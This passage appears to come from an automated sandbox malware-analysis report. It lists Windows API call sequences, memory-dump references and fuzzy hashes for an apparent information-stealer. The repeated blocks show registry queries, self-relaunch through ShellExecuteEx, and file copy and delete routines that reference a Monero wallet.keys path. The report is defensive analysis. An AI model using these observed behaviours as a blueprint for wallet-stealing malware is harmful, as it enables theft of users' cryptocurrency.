                        • ExitProcess.KERNEL32 ref: 00C569DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$System$File$ExitProcesssscanf
                        • String ID:
                        • API String ID: 2533653975-0
                        • Opcode ID: 1e9c6dab442be68ddbfe39b20f529e78543d5fc73b7cff59f593583b4db3afab
                        • Instruction ID: adf7dd5123cb361f776de8b66aaa66b8c829846045492e4677fbf73ec7608d6f
                        • Opcode Fuzzy Hash: 1e9c6dab442be68ddbfe39b20f529e78543d5fc73b7cff59f593583b4db3afab
                        • Instruction Fuzzy Hash: 4821EB75D00208AFDF08EFE5D9499EEB7B5BF48301F04852AE41AF3250EB345609CB69
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57E37
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C57E3E
                        • RegOpenKeyExA.ADVAPI32(80000002,0088DC20,00000000,00020119,?), ref: 00C57E5E
                        • RegQueryValueExA.ADVAPI32(?,0089F828,00000000,00000000,000000FF,000000FF), ref: 00C57E7F
                        • RegCloseKey.ADVAPI32(?), ref: 00C57E92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 12203ae90337bdb995dd03b6e91c22505b2b721b1d572b83bfa95720ede66c49
                        • Instruction ID: 71d9da174ea1c04715f148a80194a91f884bec1d72ad931888466873c40fc07b
                        • Opcode Fuzzy Hash: 12203ae90337bdb995dd03b6e91c22505b2b721b1d572b83bfa95720ede66c49
                        • Instruction Fuzzy Hash: 7C1182B1A44205EFE714CF95DC4AF7BBBB8EB04711F10422AFA19B7280D7B458488BA1
                        APIs
                        • StrStrA.SHLWAPI(008A0108,?,?,?,00C5140C,?,008A0108,00000000), ref: 00C5926C
                        • lstrcpyn.KERNEL32(00E8AB88,008A0108,008A0108,?,00C5140C,?,008A0108), ref: 00C59290
                        • lstrlen.KERNEL32(?,?,00C5140C,?,008A0108), ref: 00C592A7
                        • wsprintfA.USER32 ref: 00C592C7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpynlstrlenwsprintf
                        • String ID: %s%s
                        • API String ID: 1206339513-3252725368
                        • Opcode ID: 5e9938f510551722cfc1b0ccc7d72727a2a84b7379f84b339c0be4120e443403
                        • Instruction ID: 775259c0ed266d8776685b68754092c01842b8d18b0069331ee7402f7247f2b9
                        • Opcode Fuzzy Hash: 5e9938f510551722cfc1b0ccc7d72727a2a84b7379f84b339c0be4120e443403
                        • Instruction Fuzzy Hash: F0011A75500208FFDB04DFECC988EAE7BB9EB48391F188159F90DAB204C631EA44DB95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C412B4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C412BB
                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C412D7
                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C412F5
                        • RegCloseKey.ADVAPI32(?), ref: 00C412FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 9a16d7ec57909ba606c1b269f4473878690005712ca9fccef3cd117a0c2dd3d5
                        • Instruction ID: 2368b6e2a7b778755fbdd1674068d386a7d8de37725ed5795de2eeb5c96556d0
                        • Opcode Fuzzy Hash: 9a16d7ec57909ba606c1b269f4473878690005712ca9fccef3cd117a0c2dd3d5
                        • Instruction Fuzzy Hash: 490136B5A40208BFEB14DFD1DC49FAEB7B8EB48701F048156FA09E7280D6759A059F51
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 449a72f59efeb99c7ba2fc8c5a2ed3f3f809653a08885e77d5ae82cc8595fc72
                        • Instruction ID: a5f95a91553d0036da02c5f8c98f7d4a849d222059890eeac597c343f10161dd
                        • Opcode Fuzzy Hash: 449a72f59efeb99c7ba2fc8c5a2ed3f3f809653a08885e77d5ae82cc8595fc72
                        • Instruction Fuzzy Hash: 2D41E4B910079C5EDB318B248CC4BFBBBF89F45705F1444E8ED9A86182D2719B89DF68
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C56663
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 00C56726
                        • ExitProcess.KERNEL32 ref: 00C56755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 2af35dd71e3bb9385c78ba4dc4dbaf2b599aef8a782a4ca5213030464fc61f52
                        • Instruction ID: 09d58765b412e5bbd1d9515f09fedd3407fb4992f6c8d6a897bea0866fbaaa25
                        • Opcode Fuzzy Hash: 2af35dd71e3bb9385c78ba4dc4dbaf2b599aef8a782a4ca5213030464fc61f52
                        • Instruction Fuzzy Hash: 7E3149B5801218AEDB14EB91DC82BDEB778AF04301F404299F60976191DF746B8CDF6A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C60E28,00000000,?), ref: 00C5882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C58836
                        • wsprintfA.USER32 ref: 00C58850
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 897d7246373d2ada6db16c6c2ed3224209939762f8a0bd506a59cd40cca162e2
                        • Instruction ID: 1f2c63ea94891f32ff9ffce4b88dc011b9fb65ad20470bb7526b4953aded9e5e
                        • Opcode Fuzzy Hash: 897d7246373d2ada6db16c6c2ed3224209939762f8a0bd506a59cd40cca162e2
                        • Instruction Fuzzy Hash: 482157B1A40204AFEB04DFD5DD49FAEBBB8FB48701F14412AF609B7280C7795904CBA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C5951E,00000000), ref: 00C58D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C58D62
                        • wsprintfW.USER32 ref: 00C58D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 1e3b25aa4124b3e638c9ae3b745637405118975d00e7b8529c5fb6ffe7c1db76
                        • Instruction ID: a970751f0f4a87972fd5d31b5dc884eea34552a3e90e89bd2b74e01affa90319
                        • Opcode Fuzzy Hash: 1e3b25aa4124b3e638c9ae3b745637405118975d00e7b8529c5fb6ffe7c1db76
                        • Instruction Fuzzy Hash: 94E08670A40208BFD714DBD5DC0EE5977B8EB04701F040065FE0DA7280D9715E049B62
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 00C4A3FF
                        • lstrlen.KERNEL32(00000000), ref: 00C4A6BC
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 28adb393513628bd0edd266418c8590145dbb657318a0a23f8d9a39480350459
                        • Instruction ID: 462768b7e17fb4ba2d1e2e79097b154bd4afa20449f61239f3f943677e1cbfe1
                        • Opcode Fuzzy Hash: 28adb393513628bd0edd266418c8590145dbb657318a0a23f8d9a39480350459
                        • Instruction Fuzzy Hash: DCE105768101189BDB14FBA5DC91EEE7338BF14301F548269F91772091EF306A8DDB6A
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4D481
                        • lstrlen.KERNEL32(00000000), ref: 00C4D698
                        • lstrlen.KERNEL32(00000000), ref: 00C4D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 432fb8e58e7396775408b09a2b28abddae79210997b93a1b536e925789e7dbbf
                        • Instruction ID: 1509a5b550616f024c08898b4193b00db2492c2c2d3a557289282e625d49c168
                        • Opcode Fuzzy Hash: 432fb8e58e7396775408b09a2b28abddae79210997b93a1b536e925789e7dbbf
                        • Instruction Fuzzy Hash: BC9126758101189BDB04FBA2DC92EEE7338BF14301F544269F917B6091EF346A8DEB66
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                          • Part of subcall function 00C58B60: GetSystemTime.KERNEL32(00C60E1A,0089C2B8,00C605AE,?,?,00C413F9,?,0000001A,00C60E1A,00000000,?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C58B86
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C4D801
                        • lstrlen.KERNEL32(00000000), ref: 00C4D99F
                        • lstrlen.KERNEL32(00000000), ref: 00C4D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 00C4DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                         • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
